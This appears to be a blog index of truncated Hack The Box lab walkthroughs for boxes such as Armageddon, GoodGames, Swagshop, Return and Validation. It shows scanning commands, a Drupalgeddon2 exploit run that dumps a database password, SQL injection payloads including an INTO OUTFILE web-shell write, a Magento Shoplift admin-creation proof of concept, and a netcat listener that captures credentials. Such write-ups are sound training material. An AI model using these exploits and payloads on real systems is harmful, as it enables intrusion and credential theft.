htb

HTB Pennyworth

We continue with another very easy HTB box. $ nmap -p- 10.129.243.77 -sV –min-rate 5000 Here we have a Jetty Jetty 9.4.39.v20210325 Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. https://www.eclipse.org/jetty/ If we go to http://10.129.243.77:8080, we’ll be redirected to http://10.129.243.77:8080/login?from=%2F This is a Jenkins server. Leading open source automation server, Jenkins provides hundreds of plugins

HTB Bike

This is another of the HTB Starting Point’s very easy boxes. $ nmap -v -p- -sV 10.129.237.207 –min-rate 5000 Access to http://10.129.237.207/ According to the Nmap scan, the site runs under node.jsWappalyzer describes the Web Framework as Express. There is no email address control checking of the input: In fact, it seems that any input is reflected in the result. If we check for Server-Side Template Injection: The template engine

HTB Ignition

This is another of the Very easy HTB Starting Point boxes. $ sudo nano /etc/hosts $ nmap -p- -A 10.129.232.211 -sV Access to http://ignition.htb/ $ dirsearch -u http://ignition.htb -i 200 Access to http://ignition.htb/admin/ Based on HTB questions, the username is admin. As there is a form_key parameter it’s most difficult to brute-force.So, we can try then to guess manually the password using the most usual passwords. We can find more

HTB Responder

This is another of the HTB Starting Point boxes classified as very easy. $ nmap -p- -min-rate 5000 10.129.225.204 –open -v If we try to access to http://10.129.225.204 we’ll be redirected to http://unika.htb but we can’t see the site. So, let’s add it to our /etc/hostsNow we’ll obtain the correct site: $ whatweb http://unika.htb Here we can see that this site runs with php, over an Windows Apache webserver. Checking

HTB Redeemer

This is one of the starting point HTB boxes.It is rated as a very easy and only have 1 flag. $ nmap -p- -A 10.129.216.146 –min-rate 5000 So, we are facing a Redis v5.0.7 instance. According to its site: Redis is an open source (BSD licensed), in-memory data structure store used as a database, cache, message broker, and streaming engine. Redis provides data structures such as strings, hashes, lists, sets,

HTB Armageddon

$ nmap -v -p- -A 10.10.10.233 –min-rate 5000 Site inspection: http://10.10.10.233/ $ whatweb http://10.10.10.233 We are facing a Drupal 7 CMS. $ dirsearch -u http://10.10.10.233/ -i 200 http://10.10.10.233/includes/bootstrap.inc Specifically, it is a Drupal v7.56. Let’s see if this Drupal version has some vulnerability. CVE-2018-7600https://github.com/dreadlocked/Drupalgeddon2 $ git clone https://github.com/dreadlocked/Drupalgeddon2.git$ ruby drupalgeddon2.rb http://10.10.10.233 armageddon.htb>> whoami armageddon.htb>> pwd armageddon.htb>> ls /var/www/html/sites -la armageddon.htb>> ls /var/www/html/sites/default -la armageddon.htb>> cat /var/www/html/sites/default/settings.php Mysql password = CQHEy@9M*m23gBVj

HTB GoodGames

$ nmap -sV -p- goodgames.htb –min-rate 5000 http://goodgames.htb/ We can test if this site is vulnerable to an SQL Injection. If we just add a ‘, we can reach the login page with a registration form. http://internal-administration.goodgames.htb/ We don’t have credentials for this site, but as we’ve confirmed there is an sql injection let’s try to exploit it. First, we need to know how many columns exist. email=admin%40test.com’ union all

HTB Swagshop

$ nmap -p- -sV 10.10.10.140 $sudo nano /etc/hosts Access to http://swagshop.htb/ As we are facing a Magento, we can use Magescan to check it. $ wget https://github.com/steverobbins/magescan/releases/download/v1.12.9/magescan.phar $ php magescan.phar scan:all http://swagshop.htb From the magescan report, if we find about patches, the first one is SUPEE-5344. https://magento.com/security/patches/supee-5344-%E2%80%93-shoplift-bug-patchhttps://blog.sucuri.net/2015/04/magento-shoplift-supee-5344-exploits-in-the-wild.htmlhttps://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py With this poc, you should be able to add an admin user. $ python3 poc.py swagshop.htb Access to http://swagshop.htb/index.php/admin The “Froghopper” Attack After

HTB Return

$ nmap -sV -p- 10.10.11.108 -Pn –min-rate 5000 http://10.10.11.108/ http://10.10.11.108/settings.php If we add our IP into the Server Address field: $ sudo nc -lvnp 389 We get a connection and the svc-printer password. svc-printer:1edFg43012!! You can read more about this technique here. According to the nmap scan, WinRM is available, so we can try to use Evil-WinRM to connect to the machine. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

HTB Validation

$ nmap -p- -v 10.10.11.116 Access to http://10.10.11.116 The listbox values are sent to the server into a POST request: username=rffuste&country=Brazil In the response, we get a cookie user This user cookie does not change if multiple requests are performed. SQL Injection We can check if there is an SQL Injection. We have confirmed there is an SQL Injection that we can use. ‘ union select «» INTO OUTFILE ‘/var/www/html/shell.php’– – Now